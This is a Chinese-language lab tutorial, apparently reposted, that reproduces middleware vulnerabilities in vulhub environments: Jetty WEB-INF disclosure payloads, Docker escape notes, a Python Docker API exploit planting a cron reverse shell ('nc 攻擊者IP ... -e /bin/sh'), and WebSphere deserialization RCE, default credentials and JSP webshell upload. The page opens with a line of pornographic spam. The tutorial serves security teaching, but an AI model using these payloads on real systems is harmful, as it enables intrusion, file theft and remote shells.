国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere

中間件及框架列表:

IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等。

中間件所披露的問題:

中間件安全-IIS&Apache&Tomcat&Nginx漏洞復(fù)現(xiàn)

中間件安全-Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

1、中間件-K8s 安全

2、中間件-Jetty 安全

3、中間件-Docker 安全

4、中間件-WebSphere 安全

常見中間件的安全測(cè)試:

1、配置不當(dāng)-解析&弱口令

2、安全機(jī)制-特定安全漏洞

3、安全機(jī)制-弱口令爆破攻擊

4、安全應(yīng)用-框架特定安全漏洞

中間件安全測(cè)試流程:

1、判斷中間件信息-名稱&版本&三方

2、判斷中間件問題-配置不當(dāng)&公開漏洞

3、判斷中間件利用-弱口令&EXP&框架漏洞

應(yīng)用服務(wù)安全測(cè)試流程:

1、判斷服務(wù)開放情況-端口掃描&組合應(yīng)用等

2、判斷服務(wù)類型歸屬-數(shù)據(jù)庫&文件傳輸&通訊等

3、判斷服務(wù)利用方式-特定漏洞&未授權(quán)&弱口令等

中間件-K8s

介紹:kubernetes詳解

中間件-K8s:

kubernetes 簡稱 k8s,是一個(gè)由 google 開源的,用于自動(dòng)部署,擴(kuò)展和管理容器化應(yīng)用程序的開源系統(tǒng)。在 B 站內(nèi)部,k8s 在管理生產(chǎn)級(jí)容器和應(yīng)用服務(wù)部署已經(jīng)有較為廣泛和成熟的應(yīng)用。通過k8s,可跨多臺(tái)主機(jī)進(jìn)行容器編排、快速按需擴(kuò)展容器化應(yīng)用及其資源、對(duì)應(yīng)用實(shí)施狀況檢查、服務(wù)發(fā)現(xiàn)和負(fù)載均衡等。

K8s相關(guān)安全問題以及漏洞復(fù)現(xiàn)參考文章:k8s對(duì)外攻擊面總結(jié)_k8s漏洞

中間件-Jetty

介紹:

Elipse Jetty 是一個(gè)開源的 servlet 容器,它為基于 Java 的 Web 容器提供運(yùn)行環(huán)境。Jetty是一個(gè)開源的HTTP服務(wù)器和Servlet引擎,它可以為JSP和Servlet提供運(yùn)行時(shí)環(huán)境。相對(duì)于Tomcat,jetty更加輕量、更加簡易、更加靈活。

安全問題:

CVE-2021-28164-路徑信息泄露漏洞

CVE-2021-28169-雙重解碼信息泄露漏洞

CVE-2021-34429-路徑信息泄露漏洞

漏洞復(fù)現(xiàn)

CVE-2021-28164-路徑信息泄露漏洞

Jetty 版本 9.4.37 引入了有關(guān) URI 解碼的更精確的RFC3986實(shí)現(xiàn),以及一些新的合規(guī)性模式,以選擇性地允許支持某些在 Servlet 指定的 API 方法行為中可能具有模糊解釋的 URI。默認(rèn)模式允許 % 編碼。要排除以進(jìn)行 URI 規(guī)范化的字符,RFC 正確,但常見 Servlet 實(shí)現(xiàn)不假定。

默認(rèn)合規(guī)性模式允許具有包含或分段的 URI 的請(qǐng)求訪問 WEB-INF 目錄中的受保護(hù)資源。例如,請(qǐng)求可以檢索 web.xml 文件。這可能會(huì)泄露有關(guān) Web 應(yīng)用程序?qū)崿F(xiàn)的敏感信息。

%2e %2e%2e /context/%2e/WEB-INF/web.xml

此錯(cuò)誤已在版本 9.4.39 中修復(fù)。

靶場:vulhub

參考:CVE-2021-28164

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

開啟環(huán)境:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

訪問:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

payload:
//訪問敏感文件 Web.xml   /WEB-INF/web.xml
//用于繞過限制:%2e/
curl -v "http://192.168.100.134:8080/%2e/WEB-INF/web.xml"

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

或使用burp抓包,發(fā)送請(qǐng)求或直接使用瀏覽器直接url請(qǐng)求

http://you-ip:8080/%2e/WEB-INF/web.xml
CVE-2021-28169雙重解碼信息泄露漏洞

介紹:

在版本 9.4.40、10.0.2、11.0.2 之前,Jetty Servlet 中的 and 類受到雙重解碼錯(cuò)誤的影響。如果開發(fā)人員手動(dòng)使用這兩個(gè)類,攻擊者可以使用它們下載 WEB-INF 目錄中的任意敏感文件。
ConcatServlet WelcomeFilter

靶場:vulhub

參考:CVE-2021-28169 雙重解碼信息泄露漏洞

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

開啟環(huán)境:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

訪問:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

payload:
//訪問敏感文件 Web.xml。	/static?/WEB-INF/web.xml
//雙 URL 編碼以繞過限制:W
curl -v "http://your-ip:8080/static?/%2557EB-INF/web.xml"
curl -v "http://192.168.100.134:8080/static?/%2557EB-INF/web.xml"

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

使用瀏覽器發(fā)送url請(qǐng)求或使用burp抓包修改數(shù)據(jù)包,發(fā)送請(qǐng)求也可以

http://you-ip:8080/static?/WEB-INF/web.xml
CVE-2021-34429路徑信息泄露漏洞

介紹:

Eclipse Jetty 是一個(gè) Java Web 服務(wù)器和 Java Servlet 容器。

Jetty 9.4.40 修復(fù)了一個(gè)不明確的路徑信息泄露漏洞 CVE-2021-28164,CVE-2021-34429 是它的變體和繞過。

有 3 種類型的有效負(fù)載會(huì)泄露以下內(nèi)容: WEB-INF/web.xml

  • 基于 Unicode 的 URL 編碼: /%u002e/WEB-INF/web.xml

  • \0有錯(cuò)誤:. /.%00/WEB-INF/web.xml

  • \0有錯(cuò)誤:.. /a/b/..%00/WEB-INF/web.xml

該漏洞影響碼頭 9.4.37-9.4.42、10.0.1-10.0.5、11.0.1-11.0.5。

靶場:vulhub

參考:CVE-2021-34429路徑信息泄露漏洞

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

開啟環(huán)境:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

訪問:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

payload:
//訪問敏感文件 Web.xml。 /WEB-INF/web.xml
//使用有效負(fù)載繞過限制: /%u002e/WEB-INF/web.xml
curl -v "http://192.168.100.134:8080/%u002e/WEB-INF/web.xml"

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

或直接使用瀏覽器url請(qǐng)求或使用burp抓包,發(fā)送請(qǐng)求/%u002e/WEB-INF/web.xml

GET /%u002e/WEB-INF/web.xml HTTP/1.1
...

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

http://192.168.100.134:8080/%u002e/WEB-INF/web.xml

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

此兩種方式,以上的兩種CVE漏洞也可以利用成功。

中間件-Docker

介紹:Docker詳解

Docker 是一個(gè)開源的應(yīng)用容器引擎,讓開發(fā)者可以打包他們的應(yīng)用以及依賴包到一個(gè)可移植的鏡像中,然后發(fā)布到任何流行的 Linux或Windows操作系統(tǒng)的機(jī)器上,也可以實(shí)現(xiàn)虛擬化。容器是完全使用沙箱機(jī)制,相互之間不會(huì)有任何接口。

Docker 容器是使用沙盒機(jī)制,是單獨(dú)的系統(tǒng),理論上是很安全的,通過利用某種手段,再結(jié)合執(zhí)行 POC 或 EXP,就可以返回一個(gè)宿主機(jī)的高權(quán)限 Shell,并拿到宿主機(jī)的
root 權(quán)限,可以直接操作宿主機(jī)文件。 它從容器中逃了出來,因此我們形象的稱為Docker 逃逸漏洞。

//判斷容器
1、容器判斷:
-是否存在.dockerenv 文件
ls -alh /.dockerenv
-查詢系統(tǒng)進(jìn)程的 cgroup 信息:
cat /proc/1/cgroup

2、容器逃逸漏洞:權(quán)限提升
-由內(nèi)核漏洞引起 ——Dirty COW(CVE-2016-5195)
-由 Docker 軟件設(shè)計(jì)引起——CVE-2019-5736、CVE-2019-14271,CVE-2020-15257
-由配置不當(dāng)引起——開啟 privileged(特權(quán)模式)+宿主機(jī)目錄掛載(文件掛載)、功能
(capabilities)機(jī)制、sock 通信方式-CVE-2016-5195

//工具地址:https://github.com/gebl/dirtycow-docker-vdso
上傳到docker環(huán)境當(dāng)中
進(jìn)入目錄執(zhí)行make進(jìn)行編譯
執(zhí)行生成的可執(zhí)行文件即可

安全問題:

API 未經(jīng)授權(quán)訪問漏洞

漏洞復(fù)現(xiàn)

守護(hù)程序 API 未經(jīng)授權(quán)訪問漏洞

靶場:vulhub

參考:Docker守護(hù)程序 API 未經(jīng)授權(quán)訪問漏洞

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

開啟環(huán)境:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

漏洞利用:

//exp腳本,反彈shell
import docker

client = docker.DockerClient(base_url='http://you-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 攻擊者IP 監(jiān)聽端口 -e /bin/sh' >> /tmp/etc/crontabs/rumilc" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

執(zhí)行腳本:

python docker-api.py

開啟監(jiān)聽:

nc -lvvp 8888

等待反彈即可。

中間件-WebSphere

介紹:webSphere詳解

WebSphere 是 IBM 的軟件平臺(tái)。它包含了編寫、運(yùn)行和監(jiān)視全天候的工業(yè)強(qiáng)度的隨需應(yīng)變 Web 應(yīng)用程序和跨平臺(tái)、跨產(chǎn)品解決方案所需要的整個(gè)中間件基礎(chǔ)設(shè)施,如服務(wù)器、服務(wù)和工具。WebSphere 提供了可靠、靈活和健壯的軟件。

WebSphere 是一個(gè)模塊化的平臺(tái),基于業(yè)界支持的開放標(biāo)準(zhǔn)??梢酝ㄟ^受信任和持久的接口,將現(xiàn)有資產(chǎn)插入 WebSphere,可以繼續(xù)擴(kuò)展環(huán)境。WebSphere 可以在許多平臺(tái)上運(yùn)行,包括 Intel、Linux 和 z/OS。

安全問題:

反序列化CVE-2015-7450

弱口令 &&后臺(tái)Getshell

CVE-2020-4450

漏洞復(fù)現(xiàn)

反序列化CVE-2015-7450

原理:

Apache Commons Collections (ACC) 3.2.1及4.0版本未能正確驗(yàn)證用戶輸入,其InvokerTransformer類在反序列化來自可疑域的數(shù)據(jù)時(shí)存在安全漏洞,這可使攻擊者在用戶輸入中附加惡意代碼并組合運(yùn)用不同類的readObject()方法,在最終類型檢查之前執(zhí)行Java函數(shù)或字節(jié)碼(包括調(diào)用Runtime.exec()執(zhí)行本地OS命令)。

復(fù)現(xiàn):

反序列化漏洞發(fā)生位置在SOAP的通信端口8880,可使用https發(fā)送XML格式數(shù)據(jù)。

//拉取環(huán)境
docker pull iscrosales/websphere7
//開啟環(huán)境
docker run -d -p 9060:9060 -p 9043:9043 -p 8880:8880 -p 9080:9080 iscrosales/websphere7

等待環(huán)境開啟后,訪問即可。如果訪問8880端口,若出現(xiàn)如下界面,則可能存在Java反序列化漏洞。

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

漏洞利用:

可直接使用工具,梭哈一鍵利用,RCE以及上傳等操作,輸入url即可

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

檢測(cè)并執(zhí)行過后:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

執(zhí)行命令(RCE):

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

whoami,當(dāng)前路徑pwd

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

弱口令 &&后臺(tái)Getshell

弱口令:

在6.x至7.0版本,后臺(tái)登陸只需要輸入admin作為用戶標(biāo)識(shí),無需密碼,即可登陸后臺(tái)。

訪問9096端口服務(wù):

//登錄界面
//http://you-ip:9060/ibm/console/unsecureLogon.jsp
http://you-ip:9060/ibm/console
//默認(rèn)賬號(hào)密碼:
websphere/websphere
system/manager

//進(jìn)入后臺(tái)
http://you-ip:9060/ibm/console/login.do

弱口令:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

成功進(jìn)入后臺(tái):

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

后臺(tái)getshell:

1、點(diǎn)擊WebSphere 企業(yè)應(yīng)用程序,點(diǎn)擊安裝

2、創(chuàng)建jsp木馬文件,壓縮成zip文件,將zip更名為war后綴的文件,進(jìn)行上傳(上傳war包,點(diǎn)擊下一步)

3、填寫上下文根,關(guān)系到你訪問的URL

4、保存訪問shell即可(回到WebSphere 企業(yè)應(yīng)用程序,選中war包啟動(dòng),訪問shell)

http://you-ip:9080/shell.jsp

http://you-ip:9080/1/shell.jsp

通過哥斯拉進(jìn)行連接,進(jìn)行g(shù)etshell即可。

操作流程如下:

1、點(diǎn)擊WebSphere 企業(yè)應(yīng)用程序,點(diǎn)擊安裝

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

2、創(chuàng)建jsp木馬文件,壓縮成zip文件,將zip更名為war后綴的文件,進(jìn)行上傳(上傳war包,點(diǎn)擊下一步)

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

上傳,點(diǎn)擊下一步:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

3、一路下一步,到填寫上下根,填寫即可;填寫上下文根,關(guān)系到你訪問的URL。

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

等待安裝:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

4、保存訪問shell即可(回到WebSphere 企業(yè)應(yīng)用程序,選中war包啟動(dòng),訪問shell)

安裝完成后,保存配置:

保存主配置后,然后回到WebSphere 企業(yè)應(yīng)用程序,選中war包啟動(dòng),訪問shell

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

選中,點(diǎn)擊start:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

成功:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

訪問shell:

http://192.168.100.134:9080/shell.jsp

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

http://192.168.100.134:9080/1/shell.jsp

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

接下來通過哥斯拉進(jìn)行連接:

成功連接:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

命令執(zhí)行:

中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn),Web安全,漏洞復(fù)現(xiàn),中間件,kubernetes,網(wǎng)絡(luò)安全,web安全,jetty,docker

具體詳細(xì)復(fù)現(xiàn)過程可參考文章:

WebSphere漏洞復(fù)現(xiàn)

CVE-2020-4450

漏洞原理以及復(fù)現(xiàn)可參考:

WebSphere 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2020-4450

CVE-2020-4450


其他中間件安全問題以及漏洞復(fù)現(xiàn)點(diǎn)擊以下鏈接即可

跳轉(zhuǎn)參考鏈接如下:

中間件安全-CVE復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx漏洞復(fù)現(xiàn)

中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)文章來源地址http://www.zghlxwxcb.cn/news/detail-719891.html

到了這里,關(guān)于中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish

    第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish

    文章僅供學(xué)習(xí)交流,一些漏洞沒能復(fù)現(xiàn)出來(菜就多練),日后來興趣再補(bǔ)坑(大概~) 視頻鏈接:? 【小迪安全】紅藍(lán)對(duì)抗 | 網(wǎng)絡(luò)攻防 | V2022全棧培訓(xùn)_嗶哩嗶哩_bilibili https://www.bilibili.com/video/BV1pQ4y1s7kH 目錄 一、知識(shí)點(diǎn) 1、中間件-Weblogic-CVE 2、中間件-JBoos-CVE 3、中間件-Jenkin

    2024年02月19日
    瀏覽(20)
  • 小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    IIS現(xiàn)在用的也少了,漏洞也基本沒啥用 ?沒有和權(quán)限掛鉤 windows 2003上面的漏洞 配置不當(dāng):該漏洞與 Nginx、php 版本無關(guān),屬于用戶配置不當(dāng)造成的解析漏洞。 這個(gè)跟文件上傳類似,找到文件上傳點(diǎn),上傳png圖片 找到上傳路徑和nginx版本號(hào) 查看路徑 添加后綴可以用php執(zhí)行png

    2024年02月04日
    瀏覽(26)
  • Day79:服務(wù)攻防-中間件安全&IIS&Apache&Tomcat&Nginx&弱口令&不安全配置&CVE

    Day79:服務(wù)攻防-中間件安全&IIS&Apache&Tomcat&Nginx&弱口令&不安全配置&CVE

    目錄 中間件-IIS-短文件文件解析藍(lán)屏寫權(quán)限 HTTP.SYS(CVE-2015-1635)主要用作藍(lán)屏破壞,跟權(quán)限不掛鉤 IIS短文件(iis全版本都可能有這個(gè)問題) IIS文件解析 IIS寫權(quán)限 中間件-Nginx-文件解析目錄穿越漏洞CRLF CVE-2013-4547 文件上傳 解析漏洞(配置不當(dāng)) 目錄穿越(配置不當(dāng)) CRLF注入(配置

    2024年04月08日
    瀏覽(23)
  • tomcat中間件漏洞復(fù)現(xiàn)

    tomcat中間件漏洞復(fù)現(xiàn)

    Tomcat是Apache 軟件基金會(huì)(Apache Software Foundation)的Jakarta 項(xiàng)目中的一個(gè)核心項(xiàng)目,由Apache、Sun 和其他一些公司及個(gè)人共同開發(fā)而成。由于有了Sun 的參與和支持,最新的Servlet 和JSP 規(guī)范總是能在Tomcat 中得到體現(xiàn),Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 規(guī)范。因?yàn)門omcat 技術(shù)先進(jìn)、性

    2024年02月10日
    瀏覽(23)
  • 【精選】中間件 tomcat漏洞復(fù)現(xiàn)

    【精選】中間件 tomcat漏洞復(fù)現(xiàn)

    目錄 1、tomcat后臺(tái)弱口令漏洞利用 利用冰蝎連接: 2、tomcat遠(yuǎn)程代碼執(zhí)行漏洞 利用冰蝎子連接: 利用冰蝎連接: 靶場: 124.70.71.251:49586 利用冰蝎的 shell.jsp 文件 利用冰蝎子連接:

    2024年01月21日
    瀏覽(24)
  • 中間件漏洞(一)CVE-2013-4547(文件名邏輯漏洞)

    中間件漏洞(一)CVE-2013-4547(文件名邏輯漏洞)

    目錄 1. 了解nginx的工作原理 2. 漏洞原理及舉例分析 3. 前端php源碼分析 4. 注入思路 5. 漏洞復(fù)現(xiàn) 5.1 上傳文件并抓包分析 ?5.2 通過訪問文件執(zhí)行php ?注意一點(diǎn) 6. 漏洞修復(fù) nginx是以PHP語言為主。像Apache一樣,Nginx自身是不支持解析PHP語言的,只能通過加載PHP模塊來解析PHP。原理圖

    2024年02月02日
    瀏覽(16)
  • 平臺(tái)安全之中間件安全

    理解中間件 一次web訪問的順序,web瀏覽器-web服務(wù)器(狹義)-web容器-應(yīng)用服務(wù)器-數(shù)據(jù)庫服務(wù)器 web服務(wù)器 廣義:提供廣義web服務(wù)的軟件或主機(jī) 狹義:提供w3服務(wù)的軟件或主機(jī),即Web服務(wù)器軟件或裝有Web服務(wù)器軟件的計(jì)算機(jī)。例如:IIS、Apache、nginx、Lighttpd。Web服務(wù)器可以處理

    2024年02月13日
    瀏覽(19)
  • 中間件安全

    中間件安全

    vulhub漏洞復(fù)現(xiàn):https://vulhub.org/ 操作教程:https://www.freebuf.com/sectool/226207.html 一、Apache Apache(音譯為阿帕奇)是世界使用排名第一的Web服務(wù)器軟件。它可以運(yùn)行在幾乎所有廣泛使用的計(jì)算機(jī)平臺(tái)上,由于其跨平臺(tái)和安全性被廣泛使用,是最流行的Web服務(wù)器端軟件之一。 Apache是用

    2024年02月21日
    瀏覽(26)
  • Docker安裝消息中間件

    docker pull rocketmqinc/rocketmq mkdir -p /docker/rocketmq/data/namesrv/logs /docker/rocketmq/data/namesrv/store docker run -d --restart=always --name rmqnamesrv --privileged=true -p 9876:9876 -v /docker/rocketmq/data/namesrv/logs:/root/logs -v /docker/rocketmq/data/namesrv/store:/root/store -e “MAX_POSSIBLE_HEAP=100000000” rocketmqinc/rocketmq sh mqname

    2024年02月10日
    瀏覽(21)
  • 【中間件】docker數(shù)據(jù)卷

    【中間件】docker數(shù)據(jù)卷

    ?? ???????個(gè)人主頁: 五敷有你 ? ? ?? ???系列專欄: 中間件 ??穩(wěn)中求進(jìn),曬太陽 修改nginx的html頁面時(shí),需要進(jìn)入nginx內(nèi)部。并且因?yàn)閮?nèi)部沒有編輯器,修改文件也很麻煩。 這就是因?yàn)槿萜髋c數(shù)據(jù)(容器內(nèi)文件)耦合帶來的后果。要解決這個(gè)問題,必須將數(shù)據(jù)與容

    2024年03月27日
    瀏覽(17)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包